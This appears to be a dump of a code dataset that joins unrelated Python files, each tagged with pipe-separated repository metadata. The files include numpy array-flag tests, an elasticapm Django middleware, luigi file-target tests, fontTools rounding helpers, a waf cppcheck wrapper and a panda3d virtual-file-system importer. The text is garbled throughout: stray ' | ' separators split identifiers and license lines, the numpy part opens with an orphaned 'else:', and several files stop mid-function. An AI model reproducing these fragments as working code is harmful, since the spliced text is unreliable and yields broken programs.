# In Python 3.3 the representation of empty shape, strides and sub-offsets
# is an empty tuple instead of None.
# http://docs.python.org/dev/whatsnew/3.3.html#api-changes
EMPTY = ()
else:
EMPTY = None
class TestFlags(TestCase):
def setUp(self):
self.a = np.arange(10)
def test_writeable(self):
mydict = locals()
self.a.flags.writeable = False
self.assertRaises(ValueError, runstring, 'self.a[0] = 3', mydict)
self.assertRaises(ValueError, runstring, 'self.a[0:1].itemset(3)', mydict)
self.a.flags.writeable = True
self.a[0] = 5
self.a[0] = 0
def test_otherflags(self):
assert_equal(self.a.flags.carray, True)
assert_equal(self.a.flags.farray, False)
assert_equal(self.a.flags.behaved, True)
assert_equal(self.a.flags.fnc, False)
assert_equal(self.a.flags.forc, True)
assert_equal(self.a.flags.owndata, True)
assert_equal(self.a.flags.writeable, True)
assert_equal(self.a.flags.aligned, True)
assert_equal(self.a.flags.updateifcopy, False)
def test_string_align(self):
a = np.zeros(4, dtype=np.dtype('|S4'))
assert_(a.flags.aligned)
# not power of two are accessed byte-wise and thus considered aligned
a = np.zeros(5, dtype=np.dtype('|S4'))
assert_(a.flags.aligned)
def test_void_align(self):
a = np.zeros(4, dtype=np.dtype([("a", "i4"), ("b", "i4")]))
assert_(a.flags.aligned)
class TestHash(TestCase):
# see #3793
def test_int(self):
for st, ut, s in [(np.int8, np.uint8, 8),
(np.int16, np.uint16, 16),
(np.int32, np.uint32, 32),
(np.int64, np.uint64, 64)]:
for i in range(1, s):
assert_equal(hash(st(-2**i)), hash(-2**i),
err_msg="%r: -2**%d" % (st, i))
assert_equal(hash(st(2**(i - 1))), hash(2**(i - 1)),
err_msg="%r: 2**%d" % (st, i - 1))
assert_equal(hash(st(2**i - 1)), hash(2**i - 1),
err_msg="%r: 2**%d - 1" % (st, i))
i = max(i - 1, 1)
assert_equal(hash(ut(2**(i - 1))), hash(2**(i - 1)),
err_msg="%r: 2**%d" % (ut, i - 1))
assert_equal(hash(ut(2**i - 1)), hash(2**i - 1),
| err_msg="%r: 2**%d - 1" % (ut, i))
class TestAttributes(TestCase):
def setUp(self):
self.one = np.arange(10)
self.two = np.arange(20).reshape(4, 5)
self.three = np.arange(60, dtype=np.float64).resh | ape(2, 5, 6)
def test_attributes(self):
assert_equal(self.one.shape, (10,))
assert_equal(self.two.shape, (4, 5))
assert_equal(self.three.shape, (2, 5, 6))
self.three.shape = (10, 3, 2)
assert_equal(self.three.shape, (10, 3, 2))
self.three.shape = (2, 5, 6)
assert_equal(self.one.strides, (self.one.itemsize,))
num = self.two.itemsize
assert_equal(self.two.strides, (5*num, num))
num = self.three.itemsize
assert_equal(self.three.strides, (30*num, 6*num, num))
assert_equal(self.one.ndim, 1)
assert_equal(self.two.ndim, 2)
assert_equal(self.three.ndim, 3)
num = self.two.itemsize
assert_equal(self.two.size, 20)
assert_equal(self.two.nbytes, 20*num)
assert_equal(self.two.itemsize, self.two.dtype.itemsize)
assert_equal(self.two.base, np.arange(20))
def test_dtypeattr(self):
assert_equal(self.one.dtype, np.dtype(np.int_))
assert_equal(self.three.dtype, np.dtype(np.float_))
assert_equal(self.one.dtype.char, 'l')
assert_equal(self.three.dtype.char, 'd')
self.assertTrue(self.three.dtype.str[0] in '<>')
assert_equal(self.one.dtype.str[1], 'i')
assert_equal(self.three.dtype.str[1], 'f')
def test_int_subclassing(self):
# Regression test for https://github.com/numpy/numpy/pull/3526
numpy_int = np.int_(0)
if sys.version_info[0] >= 3:
# On Py3k int_ should not inherit from int, because it's not
# fixed-width anymore
assert_equal(isinstance(numpy_int, int), False)
else:
# Otherwise, it should inherit from int...
assert_equal(isinstance(numpy_int, int), True)
# ... and fast-path checks on C-API level should also work
from numpy.core.multiarray_tests import test_int_subclass
assert_equal(test_int_subclass(numpy_int), True)
def test_stridesattr(self):
x = self.one
def make_array(size, offset, strides):
return np.ndarray(size, buffer=x, dtype=int,
offset=offset*x.itemsize,
strides=strides*x.itemsize)
assert_equal(make_array(4, 4, -1), np.array([4, 3, 2, 1]))
self.assertRaises(ValueError, make_array, 4, 4, -2)
self.assertRaises(ValueError, make_array, 4, 2, -1)
self.assertRaises(ValueError, make_array, 8, 3, 1)
assert_equal(make_array(8, 3, 0), np.array([3]*8))
# Check behavior reported in gh-2503:
self.assertRaises(ValueError, make_array, (2, 3), 5, np.array([-2, -3]))
make_array(0, 0, 10)
def test_set_stridesattr(self):
x = self.one
def make_array(size, offset, strides):
try:
r = np.ndarray([size], dtype=int, buffer=x,
offset=offset*x.itemsize)
except:
raise RuntimeError(getexception())
r.strides = strides = strides*x.itemsize
return r
assert_equal(make_array(4, 4, -1), np.array([4, 3, 2, 1]))
assert_equal(make_array(7, 3, 1), np.array([3, 4, 5, 6, 7, 8, 9]))
self.assertRaises(ValueError, make_array, 4, 4, -2)
self.assertRaises(ValueError, make_array, 4, 2, -1)
self.assertRaises(RuntimeError, make_array, 8, 3, 1)
# Check that the true extent of the array is used.
# Test relies on as_strided base not exposing a buffer.
x = np.lib.stride_tricks.as_strided(np.arange(1), (10, 10), (0, 0))
def set_strides(arr, strides):
arr.strides = strides
self.assertRaises(ValueError, set_strides, x, (10*x.itemsize, x.itemsize))
# Test for offset calculations:
x = np.lib.stride_tricks.as_strided(np.arange(10, dtype=np.int8)[-1],
shape=(10,), strides=(-1,))
self.assertRaises(ValueError, set_strides, x[::-1], -1)
a = x[::-1]
a.strides = 1
a[::2].strides = 2
def test_fill(self):
for t in "?bhilqpBHILQPfdgFDGO":
x = np.empty((3, 2, 1), t)
y = np.empty((3, 2, 1), t)
x.fill(1)
y[...] = 1
assert_equal(x, y)
def test_fill_max_uint64(self):
x |
beniwohli/apm-agent-python | elasticapm/contrib/django/middleware/wsgi.py | Python | bsd-3-clause | 2,302 | 0.001738 | # BSD 3-Clause License
#
# Copyright (c) 2012, the Sentry Team, see AUTHORS for more details
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF S | UBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
from django | .apps import apps
from elasticapm.contrib.django.client import get_client
from elasticapm.middleware import ElasticAPM as ElasticAPMBase
class ElasticAPM(ElasticAPMBase):
"""
Identical to the default WSGI middleware except that
the client comes dynamically via ``get_client
>>> from elasticapm.contrib.django.middleware.wsgi import ElasticAPM
>>> application = ElasticAPM(application)
"""
def __init__(self, application):
self.application = application
@property
def client(self):
try:
app = apps.get_app_config("elasticapm.contrib.django")
return app.client
except LookupError:
return get_client()
|
mcieslik-mctp/papy | src/papy/util/codefile.py | Python | mit | 1,160 | 0.003448 | """
:mod:`papy.util.codefile`
=========================
Provides template strings for saving **PaPy** pipelines directly as Python
source code.
"""
# imap call signature
I_SIG = ' %s = NuMap(worker_type="%s", worker_num=%s, stride=%s, buffer=%s, ' + \
'ordered =%s, skip =%s, name ="%s")\n'
# piper call signature
P_SIG = ' %s = Piper(%s, parallel=%s, consume=%s, produce=%s, spawn=%s, ' + \
'timeout=%s, branch=%s, debug=%s, name="%s", ' + \
'track=%s)\n'
# worker call signature
W_SIG = 'Worker((%s,), %s, %s)'
# list signature
L_SIG = '(%s, %s)'
# papy pipeline source-file layout
P_LAY = \
'from papy import *' + '\n' + \
'from numap import NuMap' + '\n\n' + \
'%s' + '\n' + \
'%s' + '\n\n' + \
'def pipeline():' + '\n' + \
'%s' + '\n\n' + \
'%s' + '\n\n' + \
' ' + 'pipers = %s' + '\n' + \
' ' + 'xtras = %s' + '\n' + \
' ' + 'pipes = %s' + '\n' + \
| ' ' + 'return (pipers, xtras, pipes)' + '\n\n' + \
'if __name_ | _ == "__main__":' + '\n' + \
' ' + 'pipeline()' + '\n' + \
'' + '\n'
|
riga/luigi | test/local_target_test.py | Python | apache-2.0 | 11,097 | 0.000361 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import bz2
import gzip
import os
import random
import shutil
import sys
from helpers import unittest
import mock
import luigi.format
from luigi import LocalTarget
from luigi.local_target import LocalFileSystem
from luigi.target import FileAlreadyExists, MissingParentDirectory
from target_test import FileSystemTargetTestMixin
import itertools
import io
from errno import EEXIST, EXDEV
class LocalTargetTest(unittest.TestCase, FileSystemTargetTestMixin):
PATH_PREFIX = '/tmp/test.txt'
def setUp(self):
self.path = self.PATH_PREFIX + '-' + str(self.id())
self.copy = self.PATH_PREFIX + '-copy-' + str(self.id())
if os.path.exists(self.path):
os.remove(self.path)
if os.path.exists(self.copy):
os.remove(self.copy)
def tearDown(self):
if os.path.exists(self.path):
os.remove(self.path)
if os.path.exists(self.copy):
os.remove(self.copy)
def create_target(self, format=None):
return LocalTarget(self.path, format=format)
def assertCleanUp(self, tmp_path=''):
self.assertFalse(os.path.exists(tmp_path))
def test_exists(self):
t = self.create_target()
p = t.open('w')
self.assertEqual(t.exists(), os.path.exists(self.path))
p.close()
self.assertEqual(t.exists(), os.path.exists(self.path))
@unittest.skipIf(tuple(sys.version_info) < (3, 4), 'only for Python>=3.4')
def test_pathlib(self):
"""Test work with pathlib.Path"""
import pathlib
path = pathlib.Path(self.path)
self.assertFalse(path.exists())
target = LocalTarget(path)
self.assertFalse(target.exists())
with path.open('w') as stream:
stream.write('test me')
self.assertTrue(target.exists())
def test_gzip_with_module(self):
t = | LocalTarget(self.path, luigi.format.Gzip)
p = t.open('w')
test_data = b'test'
p.write(test_data)
print(self.path)
self.assertFalse(os.path.exists(self.pat | h))
p.close()
self.assertTrue(os.path.exists(self.path))
# Using gzip module as validation
f = gzip.open(self.path, 'r')
self.assertTrue(test_data == f.read())
f.close()
# Verifying our own gzip reader
f = LocalTarget(self.path, luigi.format.Gzip).open('r')
self.assertTrue(test_data == f.read())
f.close()
def test_bzip2(self):
t = LocalTarget(self.path, luigi.format.Bzip2)
p = t.open('w')
test_data = b'test'
p.write(test_data)
print(self.path)
self.assertFalse(os.path.exists(self.path))
p.close()
self.assertTrue(os.path.exists(self.path))
# Using bzip module as validation
f = bz2.BZ2File(self.path, 'r')
self.assertTrue(test_data == f.read())
f.close()
# Verifying our own bzip2 reader
f = LocalTarget(self.path, luigi.format.Bzip2).open('r')
self.assertTrue(test_data == f.read())
f.close()
def test_copy(self):
t = LocalTarget(self.path)
f = t.open('w')
test_data = 'test'
f.write(test_data)
f.close()
self.assertTrue(os.path.exists(self.path))
self.assertFalse(os.path.exists(self.copy))
t.copy(self.copy)
self.assertTrue(os.path.exists(self.path))
self.assertTrue(os.path.exists(self.copy))
self.assertEqual(t.open('r').read(), LocalTarget(self.copy).open('r').read())
def test_move(self):
t = LocalTarget(self.path)
f = t.open('w')
test_data = 'test'
f.write(test_data)
f.close()
self.assertTrue(os.path.exists(self.path))
self.assertFalse(os.path.exists(self.copy))
t.move(self.copy)
self.assertFalse(os.path.exists(self.path))
self.assertTrue(os.path.exists(self.copy))
def test_move_across_filesystems(self):
t = LocalTarget(self.path)
with t.open('w') as f:
f.write('test_data')
def rename_across_filesystems(src, dst):
err = OSError()
err.errno = EXDEV
raise err
real_rename = os.rename
def mockrename(src, dst):
if '-across-fs' in src:
real_rename(src, dst)
else:
rename_across_filesystems(src, dst)
copy = '%s-across-fs' % self.copy
with mock.patch('os.rename', mockrename):
t.move(copy)
self.assertFalse(os.path.exists(self.path))
self.assertTrue(os.path.exists(copy))
self.assertEqual('test_data', LocalTarget(copy).open('r').read())
def test_format_chain(self):
UTF8WIN = luigi.format.TextFormat(encoding='utf8', newline='\r\n')
t = LocalTarget(self.path, UTF8WIN >> luigi.format.Gzip)
a = u'我é\nçф'
with t.open('w') as f:
f.write(a)
f = gzip.open(self.path, 'rb')
b = f.read()
f.close()
self.assertEqual(b'\xe6\x88\x91\xc3\xa9\r\n\xc3\xa7\xd1\x84', b)
def test_format_chain_reverse(self):
t = LocalTarget(self.path, luigi.format.UTF8 >> luigi.format.Gzip)
f = gzip.open(self.path, 'wb')
f.write(b'\xe6\x88\x91\xc3\xa9\r\n\xc3\xa7\xd1\x84')
f.close()
with t.open('r') as f:
b = f.read()
self.assertEqual(u'我é\nçф', b)
@mock.patch('os.linesep', '\r\n')
def test_format_newline(self):
t = LocalTarget(self.path, luigi.format.SysNewLine)
with t.open('w') as f:
f.write(b'a\rb\nc\r\nd')
with t.open('r') as f:
b = f.read()
with open(self.path, 'rb') as f:
c = f.read()
self.assertEqual(b'a\nb\nc\nd', b)
self.assertEqual(b'a\r\nb\r\nc\r\nd', c)
def theoretical_io_modes(
self,
rwax='rwax',
bt=['', 'b', 't'],
plus=['', '+']):
p = itertools.product(rwax, plus, bt)
return {''.join(c) for c in list(
itertools.chain.from_iterable(
[itertools.permutations(m) for m in p]))}
def valid_io_modes(self, *a, **kw):
modes = set()
t = LocalTarget(is_tmp=True)
t.open('w').close()
for mode in self.theoretical_io_modes(*a, **kw):
try:
io.FileIO(t.path, mode).close()
except ValueError:
pass
except IOError as err:
if err.errno == EEXIST:
modes.add(mode)
else:
raise
else:
modes.add(mode)
return modes
def valid_write_io_modes_for_luigi(self):
return self.valid_io_modes('w', plus=[''])
def valid_read_io_modes_for_luigi(self):
return self.valid_io_modes('r', plus=[''])
def invalid_io_modes_for_luigi(self):
return self.valid_io_modes().difference(
self.valid_write_io_modes_for_luigi(),
self.valid_read_io_modes_for_luigi())
def test_open_modes(self):
t = LocalTarget(is_tmp=True)
print('Valid write mode:', end=' ')
for mode in self.valid_write_io_modes_for_luigi():
print(mode, end=' ')
p = t.open(mode)
p.close()
print()
print('Valid read mode:', end=' ')
for mode in self.valid_read_io_modes_for_luigi():
print(mode, end=' ')
p = t.open(mode)
p.close()
|
acsone/mozaik | mozaik_person/tests/__init__.py | Python | agpl-3.0 | 1,096 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of mozaik_person, an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# mozaik_person is free software:
# you can redistribute it and/ | or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at y | our option) any later version.
#
# mozaik_person is distributed in the hope that it will
# be useful but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with mozaik_person.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import test_res_partner
from . import test_create_user_from_partner
|
google/material-design-icons | update/venv/lib/python3.9/site-packages/fontTools/misc/roundTools.py | Python | apache-2.0 | 1,585 | 0.018297 | """
Various round-to-integer helpers.
"""
import math
import functools
import logging
log = log | ging.getLogger(__name__)
__all__ = [
"noRound",
"otRound",
"maybeRound",
"roundFunc",
]
def noRound(value):
return value
def otRound(value):
"""Round float value to neares | t integer towards ``+Infinity``.
The OpenType spec (in the section on `"normalization" of OpenType Font Variations <https://docs.microsoft.com/en-us/typography/opentype/spec/otvaroverview#coordinate-scales-and-normalization>`_)
defines the required method for converting floating point values to
fixed-point. In particular it specifies the following rounding strategy:
for fractional values of 0.5 and higher, take the next higher integer;
for other fractional values, truncate.
This function rounds the floating-point value according to this strategy
in preparation for conversion to fixed-point.
Args:
value (float): The input floating-point value.
Returns
float: The rounded value.
"""
# See this thread for how we ended up with this implementation:
# https://github.com/fonttools/fonttools/issues/1248#issuecomment-383198166
return int(math.floor(value + 0.5))
def maybeRound(v, tolerance, round=otRound):
rounded = round(v)
return rounded if abs(rounded - v) <= tolerance else v
def roundFunc(tolerance, round=otRound):
if tolerance < 0:
raise ValueError("Rounding tolerance must be positive")
if tolerance == 0:
return noRound
if tolerance >= .5:
return round
return functools.partial(maybeRound, tolerance=tolerance, round=round)
|
plotly/plotly.py | packages/python/plotly/plotly/validators/layout/slider/_minorticklen.py | Python | mit | 474 | 0 | import _plotly_utils. | basevalidators
class MinorticklenValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="minorticklen", parent_name="layout.slider", **kwargs
):
super(MinorticklenValid | ator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "arraydraw"),
min=kwargs.pop("min", 0),
**kwargs
)
|
michelm/beehive | waftools/cppcheck.py | Python | mit | 16,204 | 0.02845 | #! /usr/bin/env python
# -*- encoding: utf-8 -*-
# Michel Mooij, michel.mooij7@gmail.com
"""
Tool Description
================
This module provides a waf wrapper (i.e. waftool) around the C/C++ source code
checking tool 'cppcheck'.
See http://cppcheck.sourceforge.net/ for more information on the cppcheck tool
itself.
Note that many linux distributions already provide a ready to install version
of cppcheck. On fedora, for instance, it can be installed using yum:
'sudo yum install cppcheck'
Usage
=====
In order to use this waftool simply add it to the 'options' and 'configure'
functions of your main waf script as shown in the example below:
def options(opt):
opt.load('cppcheck', tooldir='./waftools')
def configure(conf):
conf.load('cppcheck')
Note that example shown above assumes that the cppcheck waftool is located in
the sub directory named 'waftools'.
When configured as shown in the example above, cppcheck will automatically
perform a source code analysis on all C/C++ build tasks that have been
defined in your waf build system.
The example shown below for a C program will be used as input for cppcheck when
building the task.
def build(bld):
bld.program(name='foo', src='foobar.c')
The result of the source code analysis will be stored both as xml and html
files in the build location for the task. Should any error be detected by
cppcheck the build will be aborted and a link to the html report will be shown.
When needed source code checking by cppcheck can be disabled per task, per
detected error or warning for a particular task. It can be also be disabled for
all tasks.
In order to exclude a task from source code checking add the skip option to the
task as shown below:
def build(bld):
bld.program(
name='foo',
src='foobar.c'
cppcheck_skip=True
)
When needed problems detected by cppcheck may be suppressed using a file
containing a list of suppression rules. The relative or absolute path to this
file can be added to the build task as shown in the example below:
bld.program(
name='bar',
src='foobar.c',
cppcheck_suppress='bar.suppress'
)
A cppcheck suppress file should contain one suppress rule per line. Each of
these rules will be passed as an '--suppress=<rule>' argument to cppcheck.
Dependencies
================
This waftool depends on the python pygments module, it is used for source code
syntax highlighting when creating the html reports. see http://pygments.org/ for
more information on this package.
Remarks
================
The generation of the html report is originally based on the cppcheck-htmlreport.py
script that comes shipped with the cppcheck tool.
"""
import os
import sys
import xml.etree.ElementTree as ElementTree
from waflib import Task, TaskGen, Logs, Context
PYGMENTS_EXC_MSG= '''
The required module 'pygments' could not be found. Please install it using your
platform package manager (e.g. apt-get or yum), using 'pip' or 'easy_install',
see 'http://pygments.org/download/' for installation instructions.
'''
try:
import pygments
from pygments import formatters, lexers
except ImportError, e:
Logs.warn(PYGMENTS_EXC_MSG)
raise e
def options(opt):
opt.add_option('--cppcheck-skip', dest='cppcheck_skip',
default=False, action='store_true',
help='do not check C/C++ sources (default=False)')
opt.add_option('--cppcheck-err-resume', dest='cppcheck_err_resume',
default=False, action='store_true',
help='continue in case of errors (default=False)')
opt.add_option('--cppcheck-bin-enable', dest='cppcheck_bin_enable',
default='warning,performance,portability,style,unusedFunction', action='store',
help="cppcheck option '--enable=' for binaries (default=warning,performance,portability,style,unusedFunction)")
opt.add_option('--cppcheck-lib-enable', dest='cppcheck_lib_enable',
default='warning,performance,portability,style', action='store',
help="cppcheck option '--enable=' for libraries (default=warning,performance,portability,style)")
opt.add_option('--cppcheck-std-c', dest='cppcheck_std_c',
default='c99', action='store',
help='cppcheck standard to use when checking C (default=c99)')
opt.add_option('--cppcheck-std-cxx', dest='cppcheck_std_cxx',
default='c++03', action='store',
help='cppcheck standard to use when checking C++ (default=c++03)')
opt.add_option('--cppcheck-check-config', dest='cppcheck_check_config',
default=False, action='store_true',
help='forced check for missing buildin include files, e.g. stdio.h (default=False)')
opt.add_option('--cppcheck-max-configs', dest='cppcheck_max_configs',
default='20', action='store',
help='maximum preprocessor (--max-configs) define iterations (default=20)')
def configure(conf):
if conf.options.cppcheck_skip:
conf.env.CPPCHECK_SKIP = [True]
conf.env.CPPCHECK_STD_C = conf.options.cppcheck_std_c
conf.env.CPPCHECK_STD_CXX = conf.options.cppcheck_std_cxx
conf.env.CPPCHECK_MAX_CONFIGS = conf.options.cppcheck_max_configs
conf.env.CPPCHECK_BIN_ENABLE = conf.options.cppcheck_bin_enable
conf.env.CPPCHECK_LIB_ENABLE = conf.options.cppcheck_lib_enable
conf.find_program('cppcheck', var='CPPCHECK')
@TaskGen.feature('c')
@TaskGen.feature('cxx')
def cppcheck_execute(self):
if len(self.env.CPPCHECK_SKIP) or self.bld.options.cppcheck_skip:
return
if getattr(self, 'cppcheck_skip', False):
return
task = self.create_task('cppcheck')
task.cmd = _tgen_create_cmd(self)
task.fatal = []
if not self.bld.options.cppcheck_err_resume:
task.fatal.append('error')
def _tgen_create_cmd(self):
features = getattr(self, 'features', [])
std_c = self.env.CPPCHECK_STD | _C
std_cxx = self.env.CPPCHECK_STD_CXX
max_configs = self.env.CPPCHECK_MAX_CONFIGS
bin_enable = self.env.CPPCHECK_BIN_ENABLE
lib_enable = self.env.CPPCHECK_LIB_ENABLE
cmd = '%s' % self.env.CPPCHECK
args = ['--inconclusive','--report-progress','--verbose','--xml','--xml-version=2']
args.append('--max-configs=%s' % max_configs)
if 'cxx' in features:
args.append('--language=c++')
args.append('--std=%s' | % std_cxx)
else:
args.append('--language=c')
args.append('--std=%s' % std_c)
if self.bld.options.cppcheck_check_config:
args.append('--check-config')
if set(['cprogram','cxxprogram']) & set(features):
args.append('--enable=%s' % bin_enable)
else:
args.append('--enable=%s' % lib_enable)
for src in self.to_list(getattr(self, 'source', [])):
args.append('%r' % src)
for inc in self.to_incnodes(self.to_list(getattr(self, 'includes', []))):
args.append('-I%r' % inc)
for inc in self.to_incnodes(self.to_list(self.env.INCLUDES)):
args.append('-I%r' % inc)
return '%s %s' % (cmd, ' '.join(args))
class cppcheck(Task.Task):
quiet = True
def run(self):
stderr = self.generator.bld.cmd_and_log(self.cmd, quiet=Context.STDERR, output=Context.STDERR)
self._save_xml_report(stderr)
defects = self._get_defects(stderr)
index = self._create_html_report(defects)
self._errors_evaluate(defects, index)
return 0
def _save_xml_report(self, s):
'''use cppcheck xml result string, add the command string used to invoke cppcheck
and save as xml file.
'''
header = '%s\n' % s.split('\n')[0]
root = ElementTree.fromstring(s)
cmd = ElementTree.SubElement(root.find('cppcheck'), 'cmd')
cmd.text = str(self.cmd)
body = ElementTree.tostring(root)
node = self.generator.path.get_bld().find_or_declare('cppcheck.xml')
node.write(header + body)
def _get_defects(self, xml_string):
'''evaluate the xml string returned by cppcheck (on sdterr) and use it to create
a list of defects.
'''
defects = []
for error in ElementTree.fromstring(xml_string).iter('error'):
defect = {}
defect['id'] = error.get('id')
defect['severity'] = error.get('severity')
defect['msg'] = str(error.get('msg')).replace('<','<')
defect['verbose'] = error.get('verbose')
for location in error.findall('location'):
defect['file'] = location.get('file')
defect['line'] = str(int(location.get('line')) - 1)
defects.append(defect)
return defects
def _create_html_report(self, defects):
files, css_style_defs = self._create_html_files(defects)
index = sel |
tobspr/panda3d | direct/src/showbase/VFSImporter.py | Python | bsd-3-clause | 19,654 | 0.002646 | __all__ = ['register', 'sharedPackages',
'reloadSharedPackage', 'reloadSharedPackages']
from panda3d.core import Filename, VirtualFileSystem, VirtualFileMountSystem, OFileStream, copyStream
from direct.stdpy.file import open
import sys
import marshal
import imp
import types
# The sharedPackages dictionary lists all of the "shared packages",
# special Python packages that automatically span multiple directories
# via magic in the VFSImporter. You can make a package "shared"
# simply by adding its name into this dictionary (and then calling
# reloadSharedPackages() if it's already been imported).
# When a package name is in this dictionary at import time, *all*
# instances of the package are located along sys.path, and merged into
# a single Python module with a __path__ setting that represents the
# union. Thus, you can have a direct.showbase.foo in your own
# application, and loading it won't shadow the system
# direct.showbase.ShowBase which is in a different directory on disk.
sharedPackages = {}
vfs = VirtualFileSystem.getGlobalPtr()
compiledExtensions = [ 'pyc', 'pyo' ]
if not __debug__:
# In optimized mode, we prefer loading .pyo files over .pyc files.
# We implement that by reversing the extension names.
compiledExtensions = [ 'pyo', 'pyc' ]
class VFSImporter:
""" This class serves as a Python importer to support loading
Python .py and .pyc/.pyo files from Panda's Virtual File System,
which allows loading Python source files from mounted .mf files
(among other places). """
def __init__(self, path):
if isinstance(path, Filename):
self.dir_path = Filename(path)
else:
self.dir_path = Filename.fromOsSpecific(path)
def find_module(self, fullname, path = None):
if path is None:
dir_path = self.dir_path
else:
dir_path = path
#print >>sys.stderr, "find_module(%s), dir_path = %s" % (fullname, dir_path)
basename = fullname.split('.')[-1]
path = Filename(dir_path, basename)
# First, look for Python files.
filename = Filename(path)
filename.setExtension('py')
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename,
desc=('.py', 'U', imp.PY_SOURCE))
# If there's no .py file, but there's a .pyc file, load that
# anyway.
for ext in compiledExtensions:
filename = Filename(path)
filename.setExtension(ext)
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename,
desc=('.'+ext, 'rb', imp.PY_COMPILED))
# Look for a C/C++ extension module.
for desc in imp.get_suffixes():
if desc[2] != imp.C_EXTENSION:
continue
filename = Filename(path + desc[0])
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, desc=desc)
# Finally, consider a package, i.e. a directory containing
# __init__.py.
filename = Filename(path, '__init__.py')
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, packagePath=path,
desc=('.py', 'U', imp.PY_SOURCE))
for ext in compiledExtensions:
filename = Filename(path, '__init__.' + ext)
vfile = vfs.getFile(filename, True)
if vfile:
return VFSLoader(dir_path, vfile, filename, packagePath=path,
desc=('.'+ext, 'rb', imp.PY_COMPILED))
#print >>sys.stderr, "not found."
return None
class VFSLoader:
""" The second part of VFSImporter, this is created for a
particular .py file or directory. """
def __init__(self, dir_path, vfile, filename, desc, packagePath=None):
self.dir_path = dir_path
self.timestamp = None
if vfile:
| self.timestamp = vfile.getTimestamp()
self.fil | ename = filename
self.desc = desc
self.packagePath = packagePath
def load_module(self, fullname, loadingShared = False):
#print >>sys.stderr, "load_module(%s), dir_path = %s, filename = %s" % (fullname, self.dir_path, self.filename)
if self.desc[2] == imp.PY_FROZEN:
return self._import_frozen_module(fullname)
if self.desc[2] == imp.C_EXTENSION:
return self._import_extension_module(fullname)
# Check if this is a child of a shared package.
if not loadingShared and self.packagePath and '.' in fullname:
parentname = fullname.rsplit('.', 1)[0]
if parentname in sharedPackages:
# It is. That means it's a shared package too.
parent = sys.modules[parentname]
path = getattr(parent, '__path__', None)
importer = VFSSharedImporter()
sharedPackages[fullname] = True
loader = importer.find_module(fullname, path = path)
assert loader
return loader.load_module(fullname)
code = self._read_code()
if not code:
raise ImportError('No Python code in %s' % (fullname))
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.filename.toOsSpecific()
mod.__loader__ = self
if self.packagePath:
mod.__path__ = [self.packagePath.toOsSpecific()]
#print >> sys.stderr, "loaded %s, path = %s" % (fullname, mod.__path__)
exec(code, mod.__dict__)
return sys.modules[fullname]
def getdata(self, path):
path = Filename(self.dir_path, Filename.fromOsSpecific(path))
vfile = vfs.getFile(path)
if not vfile:
raise IOError("Could not find '%s'" % (path))
return vfile.readFile(True)
def is_package(self, fullname):
return bool(self.packagePath)
def get_code(self, fullname):
return self._read_code()
def get_source(self, fullname):
return self._read_source()
def get_filename(self, fullname):
return self.filename.toOsSpecific()
def _read_source(self):
""" Returns the Python source for this file, if it is
available, or None if it is not. May raise IOError. """
if self.desc[2] == imp.PY_COMPILED or \
self.desc[2] == imp.C_EXTENSION:
return None
filename = Filename(self.filename)
filename.setExtension('py')
filename.setText()
return open(self.filename, self.desc[1]).read()
def _import_extension_module(self, fullname):
""" Loads the binary shared object as a Python module, and
returns it. """
vfile = vfs.getFile(self.filename, False)
# We can only import an extension module if it already exists on
# disk. This means if it's a truly virtual file that has no
# on-disk equivalent, we have to write it to a temporary file
# first.
if hasattr(vfile, 'getMount') and \
isinstance(vfile.getMount(), VirtualFileMountSystem):
# It's a real file.
filename = self.filename
elif self.filename.exists():
# It's a virtual file, but it's shadowing a real file in
# the same directory. Assume they're the same, and load
# the real one.
filename = self.filename
else:
# It's a virtual file with no real-world existence. Dump
# it to disk. TODO: clean up this filename.
